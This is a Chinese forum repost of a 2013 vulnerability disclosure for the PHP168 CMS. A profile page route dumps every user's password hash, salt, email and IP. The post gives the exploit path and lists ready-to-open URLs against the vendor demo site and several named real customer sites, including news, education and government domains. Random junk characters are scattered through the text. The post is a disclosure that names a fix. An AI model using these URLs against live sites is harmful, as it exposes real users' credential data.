|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile4 Q. k3 j7 l8 |) j3 |3 J2 n
6 U3 u. [' d: B* H. y4 Z; D以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
' C& H! U" N% i* G# z1 a; U% c3 p5 e$ W3 }/ @+ N+ [- V# O
http://php168.cn/com/homepage.php/admin/member-profile
1 e8 F% D9 {5 x% h7 S0 ]) S- v* @' H9 C& z6 {& W
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。6 S! g& N8 J; r/ z8 ^9 A8 r
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg( z n3 P d8 w9 m) _
% M+ ?1 j) V+ ~" C5 [+ w+ ^5 f
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
. ~+ i1 }( y5 d/ j! o; R9 g
: m" \8 q# D m5 D, [http://www.zjfzol.com.cn/homepage.php/admin/member-profile
; ` H$ b1 a/ |: ?7 J
3 a; j- X# W+ _, x3 Khttp://www.scswl.cn/homepage.php/admin/member-profile
$ Y( o5 w/ m; j0 f( E& Y, i, Z$ S2 e* M% ?
http://www.tunet.edu.cn/homepage.php/admin/member-profile
/ S5 h. R9 {) E9 t* X
- L# z( g* L0 ~2 ^& t: k0 fhttp://www.itlead.com.cn/homepage.php/admin/member-profile
$ D& A$ W8 O0 ^: i9 W f5 }$ _8 w/ X
http://www.aedp.cn/homepage.php/admin/member-profile
; U+ e, r" ]0 y7 f# E' I( k9 Q; U2 _# @
http://www.qianlongnews.com/homepage.php/test/member-profile
$ A& {7 A! g" ?# H( q! Q) N4 S1 v. |+ A: L; b0 A/ @0 \8 i
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
8 z" u0 J: |: E$ i4 q' O" L[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对